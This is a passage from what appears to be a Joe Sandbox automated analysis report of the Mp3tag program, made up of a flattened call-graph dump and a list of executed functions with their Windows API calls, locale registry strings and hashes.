RaiseException 6866->6867 6868 81dd13 6866->6868 6874 81de05 6867->6874 6869 81de51 6868->6869 6870 81de42 LoadLibraryA 6868->6870 6868->6874 6871 81de59 GetLastError 6869->6871 6872 81debd 6869->6872 6870->6869 6873 81de6f 6871->6873 6872->6874 6877 81e680 LocalAlloc 6872->6877 6873->6872 6875 81de8c RaiseException 6873->6875 6874->6863 6875->6874 6877->6874 6883 81d3e0 6884 81d3f4 6883->6884 6885 81d438 6883->6885 6895 815740 6884->6895 6888 815740 8 API calls 6889 81d40c 6888->6889 6890 815740 8 API calls 6889->6890 6892 81d418 6890->6892 6891 81d433 6902 814ea0 6891->6902 6892->6891 6893 814f70 8 API calls 6892->6893 6893->6891 6896 815754 6895->6896 6897 81578e 6895->6897 6896->6897 6900 81575c 6896->6900 6898 81578c 6897->6898 6899 815290 8 API calls 6897->6899 6898->6888 6899->6898 6900->6898 6910 815290 6900->6910 6903 814eae 6902->6903 6904 814ed3 6903->6904 6913 8144e0 6903->6913 6905 814edd VirtualFree 6904->6905 6906 814efe 6904->6906 6905->6906 6922 814d00 6906->6922 6911 81d730 8 API calls 6910->6911 6912 81529c 6911->6912 6912->6898 6914 8144ee 6913->6914 6915 8145ea 6914->6915 6928 8142c0 6914->6928 6933 814220 6914->6933 6917 814220 3 API calls 6915->6917 6920 814645 6915->6920 6916 8149df 6916->6904 6917->6915 6920->6916 6921 8149c5 MessageBoxA 6920->6921 6921->6916 6923 814d27 6922->6923 6924 814d0e VirtualFree 6923->6924 6925 814d33 6923->6925 6924->6923 6926 814e4a VirtualFree 6925->6926 6927 814e6f 6925->6927 6926->6925 6927->6885 6930 81431b 6928->6930 6929 8144c9 6929->6914 6930->6929 6931 814220 3 API calls 6930->6931 6937 8140e0 6930->6937 6931->6930 6934 814236 6933->6934 6936 81423b 6933->6936 6935 814120 3 API calls 6934->6935 6935->6936 6936->6914 6940 814050 6937->6940 6941 8140c5 6940->6941 6942 81406e 6940->6942 6941->6930 6950 813f50 6942->6950 6945 813f50 VirtualQuery 6946 81408d 6945->6946 6946->6941 6947 813f50 VirtualQuery 6946->6947 6948 8140ae 6947->6948 6948->6941 6949 814050 VirtualQuery 6948->6949 6949->6941 6951 813f69 6950->6951 6953 813fe6 6950->6953 6952 813fb5 VirtualQuery 6951->6952 6951->6953 6952->6953 6953->6941 6953->6945 6954 815ee4 6957 815eea 6954->6957 6955 817e90 14 API calls 6956 815f0f 6955->6956 6957->6955 6961 82eced 7002 82fbd0 6961->7002 6964 819270 11 API calls 6965 82ed0b 6964->6965 7024 82ea00 6965->7024 6968 819270 11 API calls 6969 82ed51 6968->6969 6970 82ea00 11 API calls 6969->6970 6971 82ed6b 6970->6971 6972 819270 11 API calls 6971->6972 6973 82ed7c 6972->6973 6974 818cb0 8 API calls 6973->6974 6975 82ed88 6974->6975 6976 818cb0 8 API calls 6975->6976 6977 82ed94 6976->6977 6978 82ea00 11 API calls 6977->6978 6979 82edae 6978->6979 6980 82edd3 6979->6980 6981 82edbe 6979->6981 6982 8192f0 8 API calls 6980->6982 7031 8192f0 6981->7031 6984 82edd1 6982->6984 6985 82ea00 11 API calls 6984->6985 6986 82ee00 6985->6986 6988 82ea00 11 API calls 6986->6988 6998 82ee4d 6986->6998 6990 82ee2a 6988->6990 6993 82ee3a 6990->6993 6994 82ee4f 6990->6994 6991 81a0b0 11 API calls 6992 82eed4 6991->6992 6997 818d90 8 API calls 6992->6997 6996 8192f0 8 API calls 6993->6996 6995 8192f0 8 API calls 6994->6995 6995->6998 6996->6998 6999 82ef08 6997->6999 7035 81a0b0 6998->7035 7000 818d90 8 API calls 6999->7000 7001 82ef1a 7000->7001 7003 818cb0 8 API calls 7002->7003 7004 82fc21 7003->7004 7005 82ea00 11 API calls 7004->7005 7006 82fc35 7005->7006 7007 82ea00 11 API calls 7006->7007 7008 82fc4f 7007->7008 7009 82fc86 7008->7009 7023 82fd40 7008->7023 7010 82fd22 7009->7010 7017 82fcad 7009->7017 7011 819270 11 API calls 7010->7011 7012 82fd20 7011->7012 7013 818d90 8 API calls 7012->7013 7014 82ff0b 7013->7014 7015 818cb0 8 API calls 7014->7015 7018 82ecfa 7015->7018 7017->7012 7038 819c40 7017->7038 7041 819ea0 7017->7041 7018->6964 7021 819ea0 11 API calls 7021->7023 7022 819c40 11 API calls 7022->7023 7023->7012 7023->7021 7023->7022 7056 833f10 7023->7056 7025 82ea28 7024->7025 7026 82ea41 7025->7026 7027 82ea2c 7025->7027 7028 819270 11 API calls 7026->7028 7029 818f00 11 API calls 7027->7029 7030 82ea3f 7028->7030 7029->7030 7030->6968 7032 819305 7031->7032 7033 818cb0 8 API calls 7032->7033 7034 819320 7033->7034 7034->6984 7072 819920 7035->7072 7039 818f00 11 API calls 7038->7039 7040 819c5a 7039->7040 7040->7017 7042 819ed4 7041->7042 7043 819ebc 7041->7043 7042->7017 7044 819ec7 7043->7044 7045 819ed9 7043->7045 7046 819270 11 API calls 7044->7046 7047 819efd 7045->7047 7048 815bd0 8 API calls 7045->7048 7046->7042 7059 819510 7047->7059 7048->7047 7051 819dc0 11 API calls 7052 819f1f 7051->7052 7053 819f39 7052->7053 7054 819510 11 API calls 7052->7054 7055 819510 11 API calls 7053->7055 7054->7053 7055->7042 7068 81a1a0 7056->7068 7062 819450 7059->7062 7063 819462 7062->7063 7067 8194a2 7062->7067 7064 818b70 11 API calls 7063->7064 7063->7067 7065 81947a 7064->7065 7066 818cb0 8 API calls 7065->7066 7066->7067 7067->7051 7069 81a1b3 7068->7069 7070 818f00 11 API calls 7069->7070 7071 81a1f4 7070->7071 7071->7023 7073 819989 7072->7073 7074 81994d 7072->7074 7075 819994 7073->7075 7076 8199bc 7073->7076 7074->7073 7079 815bd0 8 API calls 7074->7079 7077 819dc0 11 API calls 7075->7077 7078 818b70 11 API calls 7076->7078 7081 8199ac 7077->7081 7078->7081 7079->7074 7080 819a2f 7080->6991 7081->7080 7082 818cb0 8 API calls 7081->7082 7082->7080 7089 8169f0 7091 816a0f 7089->7091 7090 816aa5 7091->7090 7092 814f40 11 API calls 7091->7092 7093 816a49 7092->7093 7094 816a9a 7093->7094 7096 816a7e 7093->7096 7095 814f70 8 API calls 7094->7095 7095->7090 7098 816ad0 7096->7098 7099 814f70 8 API calls 7098->7099 7100 816aec 7099->7100 7100->7090 7101 8268f0 7102 8269e9 7101->7102 7104 8269f5 7101->7104 7105 8185a0 7102->7105 7106 818600 7105->7106 7109 8185b6 7105->7109 7106->7104 7107 818d00 8 API calls 7107->7109 7108 818d50 SysFreeString 7108->7109 7109->7106 7109->7107 7109->7108 7110 818cb0 8 API calls 7109->7110 7110->7109 7117 8168fc 7118 816907 7117->7118 7119 817e90 14 API calls 7118->7119 7120 81690c 7119->7120 7121 817fa0 13 API calls 7120->7121 7122 816911 7121->7122 7123 81cc00 7124 81cc10 7123->7124 7128 81cc31 7123->7128 7125 81cc16 7124->7125 7124->7128 7127 814f70 8 API calls 7125->7127 7126 81cc2f 7127->7126 7128->7126 7129 814f70 8 API calls 7128->7129 7129->7126 7130 81d700 7131 81d711 7130->7131 7132 81d716 7130->7132 7134 81d6b0 7131->7134 7135 81d6c1 7134->7135 7136 81d6f0 7134->7136 7135->7136 7137 81d6ca TlsGetValue 7135->7137 7136->7132 7137->7136 7138 81d6da 7137->7138 7139 81d6e2 TlsSetValue 7138->7139 7139->7136 7146 818610 7147 818643 7146->7147 7148 818626 7146->7148 7148->7147 7149 818d50 SysFreeString 7148->7149 7149->7148 7150 815e10 7151 815e20 7150->7151 7152 814f40 11 API calls 7151->7152 7153 815e28 7152->7153 7154 814f10 7155 814f2f 7154->7155 7156 814f1a 7154->7156 7156->7155 7157 815220 8 API calls 7156->7157 7157->7155 7168 819520 7171 8194b0 7168->7171 7172 8194c2 7171->7172 7176 819501 7171->7176 7173 818bd0 14 API calls 7172->7173 7172->7176 7174 8194df 7173->7174 7175 818d00 8 API calls 7174->7175 7175->7176 7177 818b20 7178 818b32 7177->7178 7179 818b49 7177->7179 7180 8151c0 8 API calls 7179->7180 7180->7178 7181 81e920 7182 81e934 7181->7182 7183 81e939 7181->7183 7185 81e620 7182->7185 7188 81e180 7185->7188 7190 81e1ac 7188->7190 7189 81e312 7189->7183 7190->7189 7192 81e720 7190->7192 7193 81e737 _Ref_count 7192->7193 7194 81e74c 7193->7194 7196 81e780 LocalFree 7193->7196 7194->7189 7196->7194 7197 815120 7198 81d730 8 API calls 7197->7198 7199 815129 7198->7199 7200 815720 7203 8156b0 7200->7203 7204 8156c7 7203->7204 7205 81570a 7204->7205 7206 815290 8 API calls 7204->7206 7206->7205 7215 815d2b 7216 815c10 11 API calls 7215->7216 7217 815d59 7216->7217 7218 818cb0 8 API calls 7217->7218 7219 815db8 7218->7219 7220 812930 FindClose 7221 861598 7220->7221 7222 813d30 7223 8133c0 3 API calls 7222->7223 7224 813d49 7223->7224 7225 819530 7226 819450 11 API calls 7225->7226 7227 819539 7226->7227 7228 816e30 7231 816b50 GetCurrentThreadId 7228->7231 7230 816e40 7232 816b61 7231->7232 7233 816b68 7231->7233 7234 815220 8 API calls 7232->7234 7233->7230 7234->7233 7235 816730 7236 818cb0 8 API calls 7235->7236 7237 816748 7236->7237 7239 816780 7237->7239 7240 8166e0 7237->7240 7241 81d1f0 11 API calls 7240->7241 7242 8166f0 7241->7242 7242->7239 7249 831734 7250 81d210 46 API calls 7249->7250 7252 831740 7250->7252 7251 8318bf 7253 81d210 46 API calls 7251->7253 7252->7251 7255 8317fe 7252->7255 7254 8318cf 7253->7254 7256 8305e0 53 API calls 7254->7256 7257 81d210 46 API calls 7255->7257 7258 8318b9 7256->7258 7259 831811 7257->7259 7261 818d90 8 API calls 7258->7261 7271 819cc0 7259->7271 7263 831937 7261->7263 7265 818cb0 8 API calls 7263->7265 7267 831943 7265->7267 7269 818cb0 8 API calls 7267->7269 7268 8305e0 53 API calls 7268->7258 7270 83194f 7269->7270 7272 819ccf 7271->7272 7273 818f00 11 API calls 7272->7273 7274 819d01 7273->7274 7275 82b5f0 7274->7275 7276 82b60e 7275->7276 7279 833ec0 7276->7279 7280 833edb 7279->7280 7281 81a1a0 11 API calls 7280->7281 7282 82b622 7281->7282 7282->7268 7288 815c40 7302 816370 7288->7302 7291 815c75 7293 815c10 11 API calls 7291->7293 7292 815c84 7294 815c10 11 API calls 7292->7294 7296 815c82 7293->7296 7295 815c91 7294->7295 7297 81a0b0 11 API calls 7295->7297 7298 818cb0 8 API calls 7296->7298 7297->7296 7299 815cbe 7298->7299 7300 818cb0 8 API calls 7299->7300 7301 815cc7 7300->7301 7303 816385 7302->7303 7304 8163f6 7303->7304 7305 81638a 7303->7305 7306 818cb0 8 API calls 7304->7306 7307 81639a 7305->7307 7310 8163a7 7305->7310 7308 815c6e 7306->7308 7309 81d1f0 11 API calls 7307->7309 7308->7291 7308->7292 7309->7308 7311 81d1f0 11 API calls 7310->7311 7311->7308 7312 812940 FindFirstFileW 7313 861590 7312->7313 7318 815e40 7323 816020 7318->7323 7321 814f70 8 API calls 7322 815e58 7321->7322 7325 81602c 7323->7325 7324 81a430 8 API calls 7324->7325 7325->7324 7326 816053 7325->7326 7329 816be0 7326->7329 7330 816be9 7329->7330 7331 815e50 7330->7331 7333 816c10 7330->7333 7331->7321 7334 816c23 7333->7334 7335 814f70 8 API calls 7334->7335 7336 816c40 7335->7336 7336->7331 7340 83294a 7341 819ea0 11 API calls 7340->7341 7342 8328c1 7341->7342 7343 832930 7342->7343 7346 819c40 11 API calls 7342->7346 7347 819ea0 11 API calls 7342->7347 7350 832905 7342->7350 7344 818d90 8 API calls 7343->7344 7345 832a6c 7344->7345 7348 818d90 8 API calls 7345->7348 7346->7340 7347->7342 7349 832a7b 7348->7349 7351 833f10 11 API calls 7350->7351 7352 832923 7351->7352 7353 819ea0 11 API calls 7352->7353 7353->7343 7357 82f34c 7358 819270 11 API calls 7357->7358 7364 82f317 7358->7364 7359 82fb20 46 API calls 7359->7364 7360 819270 11 API calls 7360->7364 7361 82f3ac 7362 818d90 8 API calls 7361->7362 7363 82f3bd 7362->7363 7364->7357 7364->7359 7364->7360 7364->7361 7365 816c50 7371 816c6d 7365->7371 7366 816cbb 7367 816c96 GetTickCount 7367->7371 7368 816caf GetTickCount 7368->7366 7368->7371 7369 816d1c GetTickCount 7369->7366 7369->7371 7370 816d5a GetTickCount 7372 816d59 7370->7372 7371->7366 7371->7367 7371->7368 7371->7369 7371->7372 7373 816ce9 GetCurrentThreadId 7371->7373 7378 816950 7371->7378 7372->7370 7375 816d89 GetTickCount 7372->7375 7376 816df9 7372->7376 7373->7366 7375->7372 7376->7366 7377 816dff GetCurrentThreadId 7376->7377 7377->7366 7379 81695d 7378->7379 7380 816993 7379->7380 7381 816986 Sleep 7379->7381 7383 8169af 7379->7383 7382 8169a5 Sleep 7380->7382 7380->7383 7381->7383 7382->7383 7383->7371 7384 812950 InitializeCriticalSection 7385 861588 7384->7385 7386 815250 7387 81d730 8 API calls 7386->7387 7388 81525d 7387->7388 7389 81527d 7388->7389 7390 8151c0 8 API calls 7388->7390 7390->7389 7391 817b53 7392 81d730 8 API calls 7391->7392 7393 817b87 7392->7393 7394 81d730 8 API calls 7393->7394 7396 817c2e 7393->7396 7397 817cca 7393->7397 7394->7396 7395 8150a0 8 API calls 7395->7397 7396->7395 7405 812960 EnterCriticalSection 7406 861580 7405->7406 7407 818560 7408 818597 7407->7408 7409 818576 7407->7409 7409->7408 7410 819330 9 API calls 7409->7410 7410->7409 7411 81aa60 7416 81a640 7411->7416 7414 814f70 8 API calls 7415 81aa78 7414->7415 7417 81a4d0 8 API calls 7416->7417 7418 81a650 7417->7418 7418->7414 7422 81d968 7423 81daeb 7422->7423 7424 817fa0 13 API calls 7423->7424 7425 81daf0 7424->7425 7426 815670 7427 815682 7426->7427 7428 8151a0 8 API calls 7427->7428 7429 8156a2 7428->7429 7430 81d670 7431 81d681 7430->7431 7432 81d6a3 7430->7432 7433 81d610 8 API calls 7431->7433 7434 81d691 TlsGetValue 7433->7434 7434->7432 7435 830f71 7436 830f82 7435->7436 7437 81d210 46 API calls 7436->7437 7438 830fa3 7437->7438 7439 82ba90 53 API calls 7438->7439 7440 830fbb 7439->7440 7441 819270 11 API calls 7440->7441 7442 830fcc 7441->7442 7443 818d90 8 API calls 7442->7443 7444 830fe9 7443->7444 7445 140477a94 7448 140478c80 7445->7448 7449 140477a9d 7448->7449 7450 140478ca3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7448->7450 7450->7449 7451 817877 7452 817899 7451->7452 7453 81d730 8 API calls 7452->7453 7454 8178ef 7453->7454 7455 81d730 8 API calls 7454->7455 7456 81768d 7454->7456 7457 817949 7454->7457 7455->7457 7458 8150a0 8 API calls 7457->7458 7458->7456

                                                                                                            Executed Functions

                                                                                                            Function 0081BFA0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 149registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                            • Opcode ID: cf050295056bdde5ead45a25077074ada7e6a35ea6842f5424e1080d86411713
                                                                                                            • Instruction ID: d2cb00d09592d0cb313d0d45e4407164cfd685a91bb64051979be52c1b48ab48
                                                                                                            • Opcode Fuzzy Hash: cf050295056bdde5ead45a25077074ada7e6a35ea6842f5424e1080d86411713
                                                                                                            • Instruction Fuzzy Hash: FC614971244FC589DB30DF65EC943DA23A8FB8978CF501125AA8D8BB2AEF74C285C345
                                                                                                            Function 0081C6F0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32 ref: 0081C71E
                                                                                                            • GetLocaleInfoW.KERNEL32 ref: 0081C737
                                                                                                              • Part of subcall function 0081C510: FindFirstFileW.KERNEL32 ref: 0081C542
                                                                                                              • Part of subcall function 0081C510: FindClose.KERNEL32 ref: 0081C55D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3216391948-0
                                                                                                            • Opcode ID: ae2cf43087a7b5a65b6905de5ac1b67a84296c35e8d348763eec01f11df62d31
                                                                                                            • Instruction ID: 89b1532c4754ad265852ca38ae5bda485a1269fc8d40da866a21388d05241835
                                                                                                            • Opcode Fuzzy Hash: ae2cf43087a7b5a65b6905de5ac1b67a84296c35e8d348763eec01f11df62d31
                                                                                                            • Instruction Fuzzy Hash: F521F366210A9089CB10EF39C8913ED27A8FB88BCCF501502FB8E87B59CF34C185C792
                                                                                                            Function 0081C510 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 158 81c510-81c558 call 818e40 call 819c10 FindFirstFileW 163 81c562-81c57c call 818cb0 158->163 164 81c55a-81c55d FindClose 158->164 164->163
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 37489bc173e22b69434d17311605f845d329d400e8b437b0345b519026356c47
                                                                                                            • Instruction ID: 9d88a08dc9a7500ba36921d01298acec85663a3eef0f52963f81fadfcecbe606
                                                                                                            • Opcode Fuzzy Hash: 37489bc173e22b69434d17311605f845d329d400e8b437b0345b519026356c47
                                                                                                            • Instruction Fuzzy Hash: 6DF05E222129C0C9CBB1EF34D8967E93755EF467A8F081321A6AD8BBE5DE10C6D58741
                                                                                                            Function 0081BB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0081BB80
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0081BBB1
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0081BC87
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0081BCC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                            • API String ID: 3168844106-3021119265
                                                                                                            • Opcode ID: 8fcacaa43937915a06f5e1c826f1082f2bf6c3bdf65975d3f94eff120d61eb1a
                                                                                                            • Instruction ID: 720c57b12b9d7ac4558e531084c68a4172565bfecf825e09971444fce19b21cf
                                                                                                            • Opcode Fuzzy Hash: 8fcacaa43937915a06f5e1c826f1082f2bf6c3bdf65975d3f94eff120d61eb1a
                                                                                                            • Instruction Fuzzy Hash: 73413026200A1488DB10EF79D8923E9276AFF5479DF846111FA8EC7A69DF74C4C5C392
                                                                                                            Function 00816FCE Relevance: 9.3, APIs: 6, Instructions: 315memoryfilelibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileProtectVirtual$AllocCreateLibraryLoadLocalRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652859266-0
                                                                                                            • Opcode ID: 211732d42550df9019350207986f7f94267b3834163aa8292cb8efabe58b8f4d
                                                                                                            • Instruction ID: da4c06abccb2a59579af7ae7daa57f1fde7b7eef2760742ac41f478dd8512be1
                                                                                                            • Opcode Fuzzy Hash: 211732d42550df9019350207986f7f94267b3834163aa8292cb8efabe58b8f4d
                                                                                                            • Instruction Fuzzy Hash: F9F13F76609B848ACB60CB1AE49079EB7B5F7C9B94F104116EB8D83B28DF79D854CF00
                                                                                                            Function 0081D440 Relevance: 3.0, APIs: 2, Instructions: 35threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetThreadLocale.KERNELBASE ref: 0081D463
                                                                                                              • Part of subcall function 0081B390: InitializeCriticalSection.KERNEL32(?,?,?,?,0081D46D), ref: 0081B39B
                                                                                                              • Part of subcall function 0081B390: GetVersion.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3A9
                                                                                                              • Part of subcall function 0081B390: GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3D0
                                                                                                              • Part of subcall function 0081B390: GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3DF
                                                                                                              • Part of subcall function 0081B390: GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3F2
                                                                                                              • Part of subcall function 0081B390: GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B401
                                                                                                              • Part of subcall function 0081B390: GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B414
                                                                                                              • Part of subcall function 0081B390: GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B423
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0081D501
                                                                                                              • Part of subcall function 0081D320: GetVersion.KERNEL32 ref: 0081D324
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc$ThreadVersion$CriticalCurrentInitializeLocaleSection
                                                                                                            • String ID:
                                                                                                            • API String ID: 129254435-0
                                                                                                            • Opcode ID: 22b67aa5bc6254f9f6b56880fc4d7a1d85e87879da1aecc30c6c2f5ed121f6e5
                                                                                                            • Instruction ID: 7d972e3ce6aae85c2f2d193b9fc8c09888d3c525c3624c711990e11028fe969f
                                                                                                            • Opcode Fuzzy Hash: 22b67aa5bc6254f9f6b56880fc4d7a1d85e87879da1aecc30c6c2f5ed121f6e5
                                                                                                            • Instruction Fuzzy Hash: 2411D7B080AF1099F711AB68BC4638A3BE9FF01316F50C519D1D9863A2EF3C41A5C7A3
                                                                                                            Function 008133C0 Relevance: 2.7, APIs: 2, Instructions: 243sleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
